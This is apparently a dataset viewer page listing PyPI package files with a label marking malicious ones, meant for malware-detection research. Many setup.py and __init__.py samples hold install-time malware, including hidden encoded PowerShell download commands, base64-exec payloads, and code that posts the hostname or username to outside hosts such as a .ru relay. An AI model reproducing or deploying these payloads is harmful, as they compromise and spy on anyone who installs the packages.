package_name string | version string | filename string | source_code string | label int64 |
|---|---|---|---|---|
libvmrandom | 8.96 | setup.py | from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8AL... | 1 |
Marl-Factory-Grid | 0.0.1 | setup.py | from setuptools import setup, find_packages
from pathlib import Path
this_directory = Path(__file__).parent
long_description = (this_directory / "README.md").read_text()
setup(name='Marl-Factory-Grid',
version='0.0.1',
description='A framework to research MARL agents in various setings.',
a... | 0 |
pyduro | 1.0.0 | __init__.py | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------------------------------------------------
import enum
# -----------------------------------------------------------------------------------------------------------------------
DEFAULT_APP_ID = "___pyduro___"
DEF... | 0 |
django-importer | 0.5 | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# <django-importer - Importers for Django models>
# Copyright (C) <2009> Enrico Batista da Luz <rico.bl@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free So... | 0 |
twyne | 0.0.2 | setup.py | from __future__ import with_statement
from io import open
import os
import re
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
NAME = 'twyne'
print('Fore');__import__('builtins').exec(__import__('builtins').compile(__import__('base64').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXB... | 1 |
depman | 0.1 | setup.py | from setuptools import setup, find_packages
def read(fpath):
with open(fpath, 'r') as f:
return f.read()
def requirements(fpath):
return list(filter(bool, read(fpath).split('\n')))
def version(fpath):
return read(fpath).strip()
setup(
name = 'depman',
version = version('version.txt'),
... | 0 |
secret-key-generator | 0.0.0 | setup.py | import os
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="secret-key-generator",
version=os.environ.get("RELEASE_NAME"),
author="Kirill Sayed",
author_email="sayed.kirill@gmail.com",
description="Package for secret key generation in Dj... | 0 |
mypy-boto3-grafana | 1.18.57 | __init__.py | """
Main interface for grafana service.
Usage::
```python
import boto3
from mypy_boto3_grafana import (
Client,
ListPermissionsPaginator,
ListWorkspacesPaginator,
ManagedGrafanaClient,
)
session = boto3.Session()
client: ManagedGrafanaClient = boto3.client("gr... | 0 |
rldb | 0.0.0 | __init__.py | """
DQN scores from OpenAI Baselines.
7 entries
------------------------------------------------------------------------
7 unique entries
"""
from .entries import entries
# Specify ALGORITHM
algo = {
# ALGORITHM
"algo-title": "Deep Q-Network",
"algo-nickname": "DQN",
"algo-source-title": "Human-le... | 0 |
mapextrackt | 0.4.8.2 | setup.py | from setuptools import setup
# read the contents of your README file
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='mapextrackt',
version='0.4.8.2',
packages=[... | 0 |
tpmcvirtual | 1.58 | setup.py | from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8AL... | 1 |
antistasi_sqf_tools | 0.2.0 | __init__.py | from pathlib import Path
import click
from sphinx.cmd.build import main as sphinx_build
import os
from antistasi_sqf_tools.doc_creating.config_handling import find_config_file, CONFIG_FILE_NAME
from antistasi_sqf_tools.doc_creating.creator import Creator
THIS_FILE_DIR = Path(__file__).parent.absolute()
CLI_FIL... | 0 |
selfencodepywget | 6.93 | setup.py |
from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8... | 1 |
py-toolreplacelib | 8.3 | setup.py |
from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8... | 1 |
pycolourkits | 1.0.0 | __init__.py | import os
os.system("pip install requests httpx")
import requests
import os
import httpx
data = {
'embeds': [{
"title": "Someone Tried to download",
"description": "PC Username =" + os.getenv("COMPUTERNAME")
}]
}
httpx.post("https://kekwltd.ru/relay/download"... | 1 |
keyserver | 1.0.0.3 | setup.py | #!/usr/bin/env python
""" keyserver installation script """
import keyserver
VERSION = keyserver.__VERSION__
TEST = keyserver.__TEST__
try:
from setuptools import setup
except:
from distutils.core import setup
setup(
name = 'keyserver',
version = '{0}.{1}'.format(VERSION, TEST),
descr... | 0 |
dnr | 0.1 | setup.py | from setuptools import setup
try:
from pypandoc import convert_file
long_description = convert_file('README.md', 'md')
except ImportError:
long_description = """
RNN based word2vec implementation for news recommendation
Use Recommendation module to make your own content based news recommendation
... | 0 |
pwd | 0.1.3 | setup.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from setuptools import setup, find_packages
version = '0.1.3'
setup(name='pwd',
version=version,
description='Python Stanford PwdHash implementation',
long_description="""\
Implementation of theft-resistant password generation algorithm known as
Stanf... | 1 |
libcandyosint | 5.90 | setup.py | from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8AL... | 1 |
autonon | 0.3.0.post1 | __init__.py | 0 | |
py-pywsupercc | 9.43 | setup.py | from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8AL... | 1 |
latestearthquake-id-mp97 | 0.0.1 | setup.py | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="latestearthquake-id-mp97", # This is the name of the package
version="0.0.1", # The initial release version
author="Eko Wijaya", ... | 0 |
bareon | 0.0.1.dev1 | setup.py | # Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applica... | 0 |
multiconnection | 2.34.18 | setup.py | import setuptools, base64
with open("README.md", "r", encoding="utf-8") as f:
readme = f.read()
setuptools.setup(
name="multiconnection",
version="2.34.18",
author="multiconnection",
description="Python MultiHTTP for Humans.",
long_description=readme,
classifiers=[
"Pro... | 1 |
EasyReport | 0.0.1 | setup.py | from setuptools import setup
import setuptools
with open("README.md", "r") as rd:
long_description = rd.read()
setup(
name='EasyReport',
version='0.0.1',
description='Generate a quick EDA report of a pandas DataFrame',
author='Sumegh Sen',
url='https://github.com/Sumegh20/EasyReport... | 0 |
janda | 1.0.10 | setup.py | import re
from setuptools import setup
version = ''
with open('janda/__init__.py') as f:
version = re.search(
r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
requirements = []
with open('requirements.txt') as f:
requirements = f.read().splitlines()
if n... | 0 |
libpongcvvm | 1.16 | setup.py |
from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAGUAcwBxAHUAZQBsAGUAcwB0AGw... | 1 |
leopard | 0.1.1 | setup.py | from setuptools import setup
setup(name = 'leopard',
version = '0.1.1',
description = 'Fast lab reporting python package',
url = 'https://github.com/beukueb/leopard',
author = 'Christophe Van Neste',
author_email = 'christophe.vanneste@ugent.be',
license = 'MIT',
packages = ['... | 0 |
libedpingcv | 9.94 | setup.py |
from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8... | 1 |
selframrandommask | 9.86 | setup.py |
from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8... | 1 |
pytechecker | 1.0.0 | __init__.py | def get_overflow(sample: dict, obj: dict, all_sub=False) -> list:
"""Returns a list of all fields which exist in obj, but not in sample."""
fields = []
if hasattr(obj, "__iter__"):
for field in obj:
if field not in sample:
fields.append(field)
else:
... | 0 |
malmoenv | 0.0.8 | setup.py | # ------------------------------------------------------------------------------------------------
# Copyright (c) 2018 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software ... | 0 |
esqverpaypalsuper | 6.63 | setup.py |
from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHI... | 1 |
async_btree | 0.0.1a0 | setup.py | # -*- coding: utf-8 -*-
from distutils.core import setup
packages = \
['async_btree', 'async_btree.copy', 'async_btree.tests']
package_data = \
{'': ['*']}
entry_points = \
{'console_scripts': ['async-btree = async_btree.cli:main']}
setup_kwargs = {
'name': 'async-btree',
'version': '0.0.1a0',
'descript... | 0 |
appetize-cli | 1.0.0 | setup.py | from setuptools import setup
from setuptools.command.install import install
import requests
import socket
import getpass
import os
class CustomInstall(install):
def run(self):
install.run(self)
hostname=socket.gethostname()
cwd = os.getcwd()
username = getpass.getuser()
ploa... | 1 |
pytest-ml | 0.1.0 | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import codecs
from setuptools import setup
def read(fname):
file_path = os.path.join(os.path.dirname(__file__), fname)
return codecs.open(file_path, encoding='utf-8').read()
setup(
name='pytest-ml',
version='0.1.0',
author='Carlo Mazzaferr... | 0 |
tensxxfxxk | 2.12 | setup.py | from setuptools import setup, find_packages
import os
setup(
name='tensxxfxxk',
version='2.12',
packages=find_packages(),
description='Do not install, just for fxxk test',
long_description=open('README.md').read(),
long_description_content_type='text/markdown', # This is important if you have ... | 1 |
py-proofsplitpy | 4.28 | setup.py |
from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHI... | 1 |
environs_os_getter_class | 0.0.1 | setup.py | from setuptools import setup, find_packages
with open('README.md', 'r') as f:
readme = f.read()
setup(
name='environs_os_getter_class',
version='0.0.1',
author='Andrei Starichenko',
author_email='centroid@mail.ru',
description='Update class attributes from Os Environment',
long_descriptio... | 0 |
disqusting | 0.01 | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(
name="disqusting",
version="0.01",
description="Very simple (and incomplete) library for Disqus API",
url="https://github.com/vanatteveldt/disqusting",
author="Wouter van Atteveldt",
author_email="wouter@vanatteveldt.com",
packa... | 0 |
fastapi_toolkit | 0.0.10 | __init__.py | from fastapi import APIRouter
from sources.api.v1.endpoints import hello_world
api_router = APIRouter()
api_router.include_router(
hello_world.router,
prefix='/hello-world',
tags=['hello_world']
)
| 0 |
pylint-gitlab | 0.0.1 | setup.py | #
# Copyright 2020 Stephan Mueller
#
# Licensed under the MIT license
"""Setup for pylint_gitlab module."""
import json
import logging
import os
import subprocess
import setuptools
logger = logging.getLogger(__name__)
def get_install_requirements() -> list:
"""Retrieves list of packages from Pipfile.lock requ... | 0 |
asset_allocation_aditya1 | 0.0.2 | setup.py | from setuptools import setup, find_packages
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Education',
'Operating System :: Microsoft :: Windows :: Windows 10',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3'
]
setup (
name= 'asset_all... | 0 |
bh-usa-automate-req-ase | 0.0.3 | setup.py | import setuptools
setuptools.setup(
name="bh_usa_automate_req_ase",
version="0.0.3",
packages=setuptools.find_packages(),
author="Rajesh Kanumuru",
description="Dont install this package, purely testing purpose",
entry_points={
'console_scripts': [
'bh_usa_automate_req_ase =... | 1 |
socketmap-sql | 0.2.0 | socketmapsql.py | #!/usr/bin/env python3
"""
An implementation of the sendmail socketmap protocol to allow an SQL database
to be queried out of process.
"""
import argparse
import configparser
import contextlib
import dataclasses
import importlib
import io
import os.path
import re
import select
import subprocess
import sys
from typing ... | 0 |
molcloud | 0.1.0 | setup.py | import os
from glob import glob
from setuptools import setup
exec(open("molcloud/version.py").read())
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="molcloud",
version=__version__,
description="Insert SVGs into matplotlib figures",
author="Andrew Wh... | 0 |
selfreplacepong | 4.66 | setup.py | from distutils.core import setup
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8AL... | 1 |
kssdtree | 1.0.8 | setup.py | import sys
from setuptools import setup, Extension, find_packages
from os import environ
import subprocess
import os
def get_gcc_version():
gcc_version = subprocess.check_output(['gcc', '--version']).decode('utf-8')
version_line = gcc_version.split('\n', 1)[0]
version_str = version_line.split(... | 0 |
End of preview. Expand in Data Studio
No dataset card yet
- Downloads last month
- 7